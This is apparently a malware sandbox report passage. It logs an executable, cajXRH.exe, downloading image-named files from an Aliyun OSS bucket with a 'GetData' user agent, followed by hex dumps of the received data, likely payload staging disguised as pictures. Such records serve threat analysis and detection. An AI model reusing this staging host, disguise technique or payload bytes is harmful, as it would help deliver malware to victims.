76 77 78 79 7a 7b 7c 7d 7e 6f 90 91 Data Ascii: !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~o

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49930	118.178.60.9	443	7108	C:\Users\user\Documents\cajXRH.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-12 03:11:46 UTC	115	OUT	GET /FOM-51.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2025-01-12 03:11:46 UTC	548	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Sun, 12 Jan 2025 03:11:46 GMT Content-Type: image/jpeg Content-Length: 4859125 Connection: close x-oss-request-id: 678332F2F9085330380F47BC Accept-Ranges: bytes ETag: "EE6CA3EEA7F9B1C81059AEF570A28C02" Last-Modified: Tue, 22 Oct 2024 14:48:26 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 9060732723227198118 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 7myj7qf5scgQWa71cKKMAg== x-oss-server-time: 15
2025-01-12 03:11:46 UTC	3548	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 Data Ascii: JFIFZExifMM*JQQ%Q%CC
2025-01-12 03:11:46 UTC	4096	IN	Data Raw: 42 cc 3b 8b 04 80 dc 85 89 f7 db 86 4b ce 35 a8 af fe 41 fa 0c 61 84 11 0a 1b 74 3d 42 1d 8b ea 87 f2 e5 bc 47 e4 9b f0 a1 6a 44 3d f7 aa 85 fc 7c 66 99 44 42 66 08 55 a3 c2 72 d1 08 6f b1 b4 88 fb 14 6d f7 a2 e6 b1 0a 4b a7 cc 8d 43 ca 42 55 ba 2d 50 3b de 75 e4 69 e5 a6 45 fe 3f 88 51 f2 8f 9a e2 49 ea ad 5a da 33 4e a3 3e d5 c6 6e c7 d1 e8 c5 06 f1 38 15 6c 30 51 e9 b2 ec bd f6 b7 43 20 6c 37 8a c5 69 36 0c 71 9e eb 37 4c 5e 64 2d ba 15 c3 be 23 92 69 e8 07 8e 31 8e 32 59 a6 f5 54 50 cc a6 0d cb 70 1b 9f a8 37 28 8e 8c a8 b6 58 2d d6 5f 3e e5 51 37 e9 fc c0 79 61 49 dc 37 0b d7 f9 38 30 21 a3 63 4a 50 26 80 0f ad 3c d1 89 c4 d8 15 09 d3 5c 40 7c a4 b7 fe fc 2d 89 04 24 ad d9 e2 58 57 f8 d2 39 21 f1 85 1f 5d ae 5b 62 f2 2d 86 49 5e 70 f6 14 48 c1 63 66 Data Ascii: B;K5Aat=BGjD=\|fDBfUromKCBU-P;uiE?QIZ3N>n8l0QC l7i6q7L^d-#i12YTPp7(X-_>Q7yaI780!cJP&<\@\|-$XW9!][b-I^pHcf
2025-01-12 03:11:46 UTC	4096	IN	Data Raw: 55 c7 be c5 78 ee 64 cd 2e 33 d8 00 81 41 01 fc 96 f3 c2 68 5b e3 86 3a 52 14 eb 36 47 9c d8 8b 1b 75 f9 f2 3e 9e 6a 5c af ac 2d 01 59 f6 e4 ed f8 06 96 96 25 32 d9 55 c2 2b cd d9 43 84 c0 8f da 8a 2e 4e 40 af e4 ef 68 35 b1 db 47 6c 13 6a 58 3b 70 ee a1 fc f0 ea cf 6e ad 25 29 22 ee a3 88 45 8b c6 2a 08 f5 8e fe d9 90 64 31 57 f5 7b 69 f4 88 ee 13 ee 88 13 dd fe 62 86 d5 85 88 9b aa 98 eb ae 62 7e dd 59 12 19 69 99 a8 6c 0d 6f 92 a5 a3 77 6e d0 53 bb 17 f4 5f d6 e6 1f 4a cf 6d f7 92 79 05 8e d4 33 04 97 04 b6 95 73 06 7a e5 99 05 66 48 93 78 17 26 6e e6 6b 89 ba b3 4a 9a d7 ee e1 45 2d c4 d9 46 38 58 a3 e7 df cb c0 a8 8b 48 54 ab ab c9 2b 10 28 f1 1f 7e 00 6d 13 0b 8f 10 81 c8 3f 99 d0 f4 09 6e a8 37 1d 0d 72 39 87 d5 f2 12 b6 cb fa 95 c3 25 72 27 66 14 Data Ascii: Uxd.3Ah[:R6Gu>j\-Y%2U+C.N@h5GljX;pn%)"E*d1W{ibb~YilownS_Jmy3szfHx&nkJE-F8XHT+(~m?n7r9%r'f
2025-01-12 03:11:46 UTC	4096	IN	Data Raw: 45 e5 5e 68 30 58 bc f3 3c 4c f2 55 29 ac 64 46 5d 3a 9d 79 a5 77 53 ff 44 c3 e1 4a bd ab 8a bd d4 75 ea e1 2a ee 82 37 b9 6b 8b 4d 69 c9 72 b7 c8 66 c5 06 1b db fb d1 44 d1 f5 36 5b 9f 70 43 e3 b9 cc 9d 24 02 a0 15 1a ee 33 51 a6 de 11 4b 6e 87 8e 08 53 81 c7 39 1d bd 06 98 20 7a 9b 47 b4 aa c5 34 08 11 e2 e2 77 2e 0a 28 8a 33 9b 65 f3 3a 67 17 4e 17 e5 d0 55 59 0e 94 52 4b da e3 d0 7a 25 77 a6 34 0e aa 88 bd f9 1f a8 08 f8 42 83 d2 79 43 2f 04 cc aa cd fb df 7b c0 14 58 c6 51 a2 5e 37 42 12 e5 22 53 12 9f 78 be b5 39 59 c1 b2 1b 55 3b d8 b9 8f e2 36 93 6c 44 d2 80 9d 04 d2 7c 54 bb a2 23 a2 95 da 63 2d 43 a0 da 70 ab 87 c5 6b ef 95 b1 2a bd 9b 5e 30 06 ef 83 ea 01 6e 63 4c 04 68 89 7a 93 34 80 33 0b 68 86 5c 60 2f 6b 05 3f d6 5f 19 77 94 92 45 e3 e4 5c Data Ascii: E^h0X<LU)dF]:ywSDJu7kMirfD6[pC$3QKnS9 zG4w.(3e:gNUYRKz%w4ByC/{XQ^7B"Sx9YU;6lD\|T#c-Cpk^0ncLhz43h\`/k?_wE\
2025-01-12 03:11:46 UTC	4096	IN	Data Raw: c3 8f ae 6b a3 4e 8c 8c 89 8a 8b bb 66 fa 15 1c 40 d7 45 6a 0d 3c 0a ea 62 81 9f 9c 9d 9e b3 ea 13 ac cb d0 8f f2 eb dc 40 32 33 15 5f dc 2b 1c db c0 69 be 0d f5 9a fc b0 a5 8c 0d 14 ff 63 f5 b9 a4 8d b4 ad be 22 34 78 e5 cc 65 24 7e f7 de d1 9a 58 cb 99 5d 98 d0 31 c2 08 cf dd 57 4b b4 a1 1c 1c 1b b7 d4 3e 65 a5 e6 e3 12 2f 65 7b e1 ee 0d 0c 0b fa 6d b3 dc fd 3b 87 d8 fc 7c 7e dd 05 02 03 04 6d 3f 57 b6 57 83 5f 29 0d 83 6b 34 1d fb 27 35 0f 16 ff 3b 16 00 1b 13 18 f6 b1 66 21 22 45 ad 33 ab 43 0c 2d c3 cf b7 0c 2e 49 3f 87 34 b9 62 37 5e 2b 2f 1b 64 ba fa 3f 3e 3f 40 43 80 25 cd 43 cb 23 6c 4d a3 0c bf 51 4e c4 67 da 15 57 3c e4 e7 7f b8 99 36 7f 5e 9c 51 d2 37 d9 7b 63 80 ac 75 5b 79 44 1a 33 ad 95 60 78 00 1d 23 18 b0 aa 39 1f 25 1a a3 fc d2 ed 9d d9 Data Ascii: kNf@Ej<b@23_+ic"4xe$~X]1WK>e/e{m;\|~m?WW_)k4'5;f!"E3C-.I?4b7^+/d?>?@C%C#lMQNgW<6^Q7{cu[yD3`x#9%
2025-01-12 03:11:46 UTC	4096	IN	Data Raw: 2c 4d a6 a0 20 85 bf 62 23 7d 82 17 a5 30 de 99 08 fd bd 71 3f 39 61 73 43 04 d3 d0 32 6b df ec 1f f3 aa 3d 7b 0a ac d4 c6 23 eb ed fa 6d 34 b5 ed 0c e2 bd 2c ed e9 83 bc 4d 87 be 3e 5f 02 ba 42 ba da 19 39 86 8b 76 98 c3 52 60 65 25 e5 a0 40 e2 e2 87 c6 57 a0 12 c5 86 50 1e d8 82 61 b1 e8 7b 70 85 f2 3b b7 dd 68 1e f0 82 30 32 37 c7 33 54 06 4a a4 ff 6e be 09 90 75 b8 64 7a 3e 21 db ce 6f 5c 64 44 b9 59 00 93 ff 91 7d e8 f9 20 94 90 60 c8 6f 44 97 f9 8e b9 3f 4e a3 4f 16 b9 47 f2 81 03 6a 69 e2 21 55 c2 e5 97 52 04 26 ef ae c8 f0 44 77 88 66 31 a0 58 9d 00 de 3e a6 b9 c8 84 84 87 db 90 d9 4b f7 1b 42 d5 22 bd 5d b8 39 1d f5 0a 38 c0 d7 f6 11 bc a9 e2 0c 57 c6 d6 d2 a9 8d 6a 24 3b 74 4e 4b d1 a2 f8 51 7c c5 b8 66 61 13 6e 3f 61 be 64 71 7e 98 bf 08 7c a7 Data Ascii: ,M b#}0q?9asC2k={#m4,M>_B9vR`e%@WPa{p;h0273TJnudz>!o\dDY} `oD?NOGji!UR&Dwf1X>KB"]98Wj$;tNKQ\|fan?adq~\|
2025-01-12 03:11:46 UTC	4096	IN	Data Raw: 94 13 4b ba 59 94 28 79 a8 e0 04 9d d9 34 71 d1 8c 52 64 54 a0 2b 3c 9c 31 d6 31 5f dd b0 e1 72 5d e3 d3 0b c9 a4 8c fb 2c 74 4a 06 21 9f e8 77 ac 0e 7a 81 04 97 79 d9 a7 dd 40 e7 17 4f ab a4 75 32 04 32 e1 14 a8 64 5f 11 ea c6 56 50 d4 0e a9 a2 60 f3 93 c9 f3 5b a6 1a 47 9d 93 21 ea 45 f3 4d b6 6f fb a9 28 33 1d 5a 7f 16 47 e8 cf ef 81 45 43 18 41 ba 88 08 34 0b 76 70 e2 cb ca 69 b2 1e ec 31 ce 87 99 c8 ea 75 26 3c 60 26 76 99 85 6f 63 0e 0a a5 9a c7 af 0b ca ae 36 08 d2 74 3d 9c 9f c4 1f ad bf b0 84 3c 40 df 89 dd 19 5a d3 d7 79 ab d7 2e 2a a0 76 2f e6 75 8b 65 39 ad 89 15 b0 7f fa 18 c5 c7 ac b2 d7 44 6c f2 c9 cc af e9 40 b3 57 30 a5 f3 1f f5 06 cf 73 14 18 f9 0d 72 f7 19 79 98 57 e5 11 81 1a 41 9d 8f a7 7d ea 03 5c 14 65 f8 a6 73 dd d4 70 b3 48 cb 66 Data Ascii: KY(y4qRdT+<11_r],tJ!wzy@Ou22d_VP`[G!EMo(3ZGECA4vpi1u&<`&voc6t=<@Zy.*v/ue9Dl@W0sryWA}\espHf
2025-01-12 03:11:46 UTC	4096	IN	Data Raw: 7e 30 df f0 37 2c a5 37 4f 4c e2 13 7c d1 f8 91 c5 fa be cf 9e 00 28 6a dd ff a3 dc ca c7 5f af 65 39 20 43 0f 76 27 75 a7 a8 f1 fa 94 9f e4 b0 f7 a8 82 87 3b 0a 53 b7 20 93 c5 42 21 59 4a 44 cf 6d 00 01 ce a2 49 10 81 c0 c4 c2 ee b6 e5 6b df 46 07 d3 21 07 58 b3 27 fb fe f2 08 3e bc 0d 03 78 9c 6a b4 0f 93 15 14 83 ae 77 c8 e3 dc db 3a e9 9b 9d 1c c6 8a 7b 52 97 8e 19 85 b7 fb c2 a6 6b fd 94 63 78 f1 63 13 10 63 6f 18 d5 92 b6 d1 b7 a2 84 9b d4 90 d9 84 fc ef a5 a6 c5 ba b6 64 c7 fe d4 d4 23 c0 71 8e e4 e7 87 ee e0 7b 41 ab 03 0e d0 58 f4 61 98 ac 8a bc 7f 9b 4c 5a 39 6c 26 9a c8 d3 6c b4 71 fa 5a e7 33 7a 60 25 a6 5a 83 a7 05 e0 89 ab f3 71 7b 1f 34 10 5a c9 8f 29 a8 53 58 fe 56 32 96 b8 9e 3a d9 ee 0c 60 09 71 b5 2b 70 55 a8 b7 e2 8b 6b 95 ad 89 2f ca Data Ascii: ~07,7OL\|(j_e9 Cv'u;S B!YJDmIkF!X'>xjw:{Rkcxccod#q{AXaLZ9l&lqZ3z`%Zq{4Z)SXV2:`q+pUk/
2025-01-12 03:11:46 UTC	4096	IN	Data Raw: e7 04 8e cb 30 d6 37 73 19 58 f3 d5 05 6a d7 87 a6 a4 b9 8e a3 5d cc d5 8b 34 ca e2 6a a0 78 0e e3 7b 1c 29 5a a6 5b 55 62 f1 e6 be 23 a0 43 ad e5 d7 92 f7 b3 96 4f 03 54 71 e0 f1 af 06 a6 f0 00 d1 7e 0a b5 f4 09 e0 28 9e fb 47 84 32 32 1b 8a 9f c1 2e bc e2 8e a0 2e ff 90 dd 7e c7 83 94 f3 d0 5a 05 5e 0b 2c b3 a4 f8 4a e7 0f 49 f6 3d ff 18 c0 83 1f 5d f8 00 bd db 23 65 28 8b 33 a9 4d 2b 81 26 66 9c dc 18 b6 96 f5 c0 bf 49 34 bb da 49 5e 06 d6 0f 1c e9 ba c4 8c 4c bb 0d 49 a4 6a fd d0 ef 7e 6b 35 34 10 92 02 52 67 16 58 07 e6 47 e0 dc bb dc 14 5e a1 d9 f0 67 70 2c ed fa 8f ca 33 6f ad 4f 2b e0 78 1e f0 18 a4 c5 e4 02 81 a3 0f 9f 0e 1b 45 92 27 fc 39 cc be 57 c0 4c f8 c9 c4 77 47 d4 ac 33 24 78 3d f0 d1 e4 b8 d2 ce 88 69 21 65 3a 2c 1f 95 b1 20 31 6f 2a 06 Data Ascii: 07sXj]4jx{)Z[Ub#COTq~(G22..~Z^,JI=]#e(3M+&fI4I^LIj~k54RgXG^gp,3oO+xE'9WLwG3$x=i!e:, 1o*
2025-01-12 03:11:46 UTC	4096	IN	Data Raw: be d0 2a 4c 19 64 3b ba 0e 94 4e 20 15 9f c2 86 3a 4f 85 f3 ee 58 cd 35 91 2f 10 20 88 da 3e c0 05 f8 22 66 79 44 a0 a8 56 48 12 18 4c 26 67 bf 07 bd 0e 8a 4f b7 62 4f 64 7b 46 88 30 02 d0 63 3b 3d 3c 2c 8c 51 e6 c8 ad 43 c5 a4 f1 40 de 99 5c b6 f7 dc 3c 7d 03 cf d9 bc 50 d4 5c 1b dd e0 e1 e2 85 6d a9 c3 e7 80 7d cd 51 5d 8b 19 fb d4 7c 96 d7 f0 1c 7d 23 ef f9 3d bf d8 fd 3e b9 23 40 ea b3 f0 27 06 c6 ea 0b 81 ce 0f cf e6 d6 16 19 12 9a 03 7d 2b 37 16 c5 97 7f 38 15 f7 a1 1d 02 22 4b 1f a3 92 9d c1 35 82 21 2c 90 85 a7 9e 04 28 f5 b1 d9 e8 96 b1 29 17 fc ee 8c bf c7 80 28 0e ea b1 fb 7e 34 d7 f3 21 35 2f 26 43 09 73 42 b5 c9 ae 73 45 1e 38 5f c7 ea 8b e0 a7 ba f0 52 79 4f c7 e5 a4 8b dd 4b 28 03 3d a1 25 9f ac b6 97 e3 25 09 20 15 2d d1 f6 c6 3d 63 88 5a Data Ascii: *Ld;N :OX5/ >"fyDVHL&gObOd{F0c;=<,QC@\<}P\m}Q]\|}#=>#@'}+78"K5!,()(~4!5/&CsBsE8_RyOK(=%% -=cZ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49992	118.178.60.9	443	7108	C:\Users\user\Documents\cajXRH.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-12 03:11:57 UTC	115	OUT	GET /FOM-52.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2025-01-12 03:11:58 UTC	547	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Sun, 12 Jan 2025 03:11:58 GMT Content-Type: image/jpeg Content-Length: 5062442 Connection: close x-oss-request-id: 678332FE1AFF6530372BC2D6 Accept-Ranges: bytes ETag: "70C21DA900796B279A09040B00953E40" Last-Modified: Mon, 18 Nov 2024 15:32:22 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 360383310743409046 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: cMIdqQB5ayeaCQQLAJU+QA== x-oss-server-time: 12
2025-01-12 03:11:58 UTC	3549	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-12 03:11:58 UTC	4096	IN	Data Raw: 76 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4 Data Ascii: v;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>\|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V\|
2025-01-12 03:11:58 UTC	4096	IN	Data Raw: 77 a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f Data Ascii: wV(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi\|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
2025-01-12 03:11:58 UTC	4096	IN	Data Raw: f5 f5 f3 fb ff fd f3 f5 f7 f5 f3 eb ef ed d3 d5 d7 d5 d3 dd bf a7 d3 d5 d3 d5 d3 2d 2f 2d 33 37 37 75 32 3d 3f 2d 33 35 27 35 33 2d 2f 3d 53 55 47 55 53 5d 5f 5d 53 45 57 55 53 11 b2 50 73 3f 77 75 73 f1 8d 4d 73 a9 77 75 73 6d 3f 17 53 b5 56 55 53 5d 5f 5d 53 55 57 55 53 2d 2f 2d 33 35 37 35 33 3d 0f 47 33 15 2c 35 33 2d 2f 2d d3 d5 d7 d5 d3 dd df dd d3 d5 d7 d5 d3 ed ef ed f3 f5 f7 f5 f3 fd ff fd f3 f5 f7 f5 f3 4d c9 97 d3 95 d7 d5 d3 dd df dd d3 d5 d7 d5 d3 2d 1f 00 33 51 37 35 33 3d 3f 3d 33 35 37 35 33 2d 2f 2d 53 55 57 55 53 5d 5f 5d 53 55 57 55 53 43 1b 08 0b 01 77 75 73 1e cd 7c 73 75 67 75 73 6d 6f 6d 53 55 57 55 53 5d 5f 5d 53 55 57 55 53 2d 2f 2d 33 15 37 35 53 13 4d 59 52 41 56 35 33 e5 a6 2d d3 d5 07 d4 d3 dd df dd d3 d5 d7 d5 d3 ed ef ed f3 Data Ascii: -/-377u2=?-35'53-/=SUGUS]_]SEWUSPs?wusMswusm?SVUS]_]SUWUS-/-35753=G3,53-/-M-3Q753=?=35753-/-SUWUS]_]SUWUSCwus\|sugusmomSUWUS]_]SUWUS-/-375SMYRAV53-
2025-01-12 03:11:58 UTC	4096	IN	Data Raw: d1 7d e2 3a fb d9 7f 2d 5c 08 7e 89 cb e9 3a 78 19 d3 d3 54 a8 dd 3b c0 68 9c d3 da f6 a0 3f b8 09 85 13 9c b2 89 02 f5 bb 84 84 22 99 a1 5c eb db e4 e4 52 d7 a8 84 57 57 3d d3 53 dd 2c 15 fe 48 f8 17 59 7b 94 02 a5 74 75 f2 ab 6b 6d 53 55 5c 97 a4 8d b7 85 fd 1e 57 33 82 c4 fc f5 5b b3 98 02 7d b4 7b 18 33 b8 53 11 3f c4 e7 e4 99 d5 df 7a 12 6b f1 4b ab 5b 8f 5c 2e 0b c5 75 fb 0d d3 04 7a 6d a5 1d 7f b1 af 41 46 fd 97 72 44 70 9c 6c f0 98 c6 38 c7 3a 4f 9d 67 53 5d 8b 18 45 fa 27 78 f9 2c e7 bf e3 1a 15 03 e6 d9 54 24 d6 03 bf c8 c3 24 e4 ff 0d e1 62 93 bb 32 d3 1d e0 a9 69 56 22 dc 79 04 9f f6 79 91 f4 ce a4 27 3e 2c 7c 5a 6b f3 21 34 52 4f 12 6e 97 99 0b 32 20 48 ad 50 69 a7 06 6a 8b 46 53 7e 44 e7 8d 63 9d 43 d3 36 f2 39 ef 4b 76 db 20 c3 a9 cd f4 6d Data Ascii: }:-\~:xT;h?"\RWW=S,HY{tukmSU\W3[}{3S?zkK[\.uzmAFrDpl8:OgS]E'x,T$$b2iV"yy'>,\|Zk!4ROn2 HPijFS~DcC69Kv m
2025-01-12 03:11:58 UTC	4096	IN	Data Raw: 5c f2 f3 f2 cb a8 4e 59 1d d2 ce 66 43 81 7b ff 67 50 14 99 fb dd 4e 2d 27 1b 3b 32 e1 3d 33 3a 03 dd 71 52 2f 3d b3 f7 09 f2 37 09 35 05 d2 00 d7 a7 6e a2 5b 79 ad 9f 96 b5 c6 ed 9d 66 b3 39 53 74 34 ad bd bc 93 b3 fe 71 77 93 a5 84 18 86 55 55 ba d3 80 5c 53 d8 33 71 4b ee a2 49 17 31 de 70 f5 2e 3f d4 1a 6a 27 35 da f8 c9 29 d3 3d 14 a5 d5 dd 18 d9 f7 74 d2 59 bd 8b 6e 18 e6 02 30 b1 d7 f9 6b fa e2 61 91 0a 36 8b dc 30 3b 0f bb de d3 87 8c 44 53 a3 22 0d aa a3 e3 13 d4 68 4b 97 1e 19 a2 5f ef 4f 5c 9c 5f 83 e2 ed 0e 6b 27 d3 18 e0 1f 57 f6 99 4e 8f 66 e4 e9 d6 c4 39 a5 10 98 95 71 d9 7b bc 71 9c 9c 89 c1 9c 58 3a b4 2b 66 f8 3c 84 df 79 ba 43 96 ad af 4f c6 9e 70 72 72 50 0a 98 50 ac 17 9d c0 f8 94 89 96 25 87 df 01 09 25 05 6d 3f 30 e0 76 8e 06 07 6c Data Ascii: \NYfC{gPN-';2=3:qR/=75n[yf9St4qwUU\S3qKI1p.?j'5)=tYn0ka60;DS"hK_O\_k'WNf9q{qX:+f<yCOprrPP%%m?0vl
2025-01-12 03:11:58 UTC	4096	IN	Data Raw: 20 fb 64 56 1a 91 6e df 20 2c 89 77 e2 e2 05 39 f2 8e f5 00 2d 52 de 02 01 04 ca 1a ce 6a d2 47 a1 f6 d0 fe 59 5f 7b be ab de 7e b5 7b 3a bc 5c 60 b4 14 c4 40 8e 4f 1b d3 50 30 ca 88 05 19 87 a6 6c 44 9c 38 ec 39 0e 59 7b 02 e0 f1 72 5e f5 ad 67 1a cd 99 59 ab ba 5e 62 b2 6a a6 96 6c 3f b0 7f 47 31 af f9 8d b1 e6 2c 04 cc 68 ac 20 ea 27 da fc 3a c9 29 c2 2d 03 bc 6d b2 50 da 12 b2 4e b6 81 da 21 4d f8 86 bb 30 9c c3 3a 42 00 c7 75 98 22 d5 e2 ed f7 ca c4 d5 09 a4 4e 82 04 d4 70 9c 5e b4 e3 6c a8 46 17 b5 25 7a 7b b5 5c 61 52 62 b2 1a fe 80 42 8b a0 8b af 69 84 9a 79 9f 8b 45 e0 9d 05 e1 0c 2d e5 1f 50 b8 e2 04 38 e7 df 32 37 b0 48 b1 af 82 c3 27 a8 d2 aa e1 62 df e9 b2 a2 12 f5 be 96 d6 5d 5d 4d 27 3a 1a 32 92 06 ad 9a 5b a6 db 14 ee 80 13 e1 a7 67 c5 71 Data Ascii: dVn ,w9-RjGY_{~{:\`@OP0lD89Y{r^gY^bjl?G1,h ':)-mPN!M0:Bu"Np^lF%z{\aRbBiyE-P827H'b]]M':2[gq
2025-01-12 03:11:58 UTC	4096	IN	Data Raw: 11 ac 16 c6 07 c4 9d 58 cd bb f4 f0 2b 3a 16 5a da 8a 33 81 27 42 b4 e4 1c b3 44 f3 eb 30 85 ed 13 a0 b4 46 35 68 06 83 59 2b bf 9b 83 03 97 31 12 15 bc 78 b1 76 b9 71 21 32 04 6b 81 a4 83 32 6f d6 69 98 27 df ea f9 0c 4f 4b 67 2f 4b 06 67 44 04 ef 78 60 0a 1a 43 f5 40 32 c2 0d 65 17 e5 08 cc a8 23 c1 d9 dd 70 6e 88 fc 7f 8d 81 6d 3c 8a c0 7c 8f 3d 55 13 79 ca fa 4f 7d 9f 59 1f ab 7a 58 3c b6 7e 0a 9f 2b 23 7e 6a 96 9f 38 e0 63 e5 5a 1a 32 5b b4 2a 2e c8 4b fc 30 60 d4 a2 2b 2b bb 40 ab 29 c3 47 5a c5 72 2a 67 22 60 fd 3a 2c 8c 49 94 ad 10 8c f4 1c aa 13 b2 44 63 6e 0d 2e 1c 0e 75 75 75 69 83 57 e4 6c 56 e5 7f 18 20 b8 d1 37 88 2a 1b 65 fe 57 b8 31 b5 b2 3c d8 01 d7 18 1c 20 44 7d d7 1c 11 ca 50 b1 34 77 e7 17 39 01 6f c0 e8 d3 94 88 53 e8 54 bc 80 c3 59 Data Ascii: X+:Z3'BD0F5hY+1xvq!2k2oi'OKg/KgDx`C@2e#pnm<\|=UyO}YzX<~+#~j8cZ2[.K0`++@)GZrg"`:,IDcn.uuuiWlV 7*eW1< D}P4w9oSTY
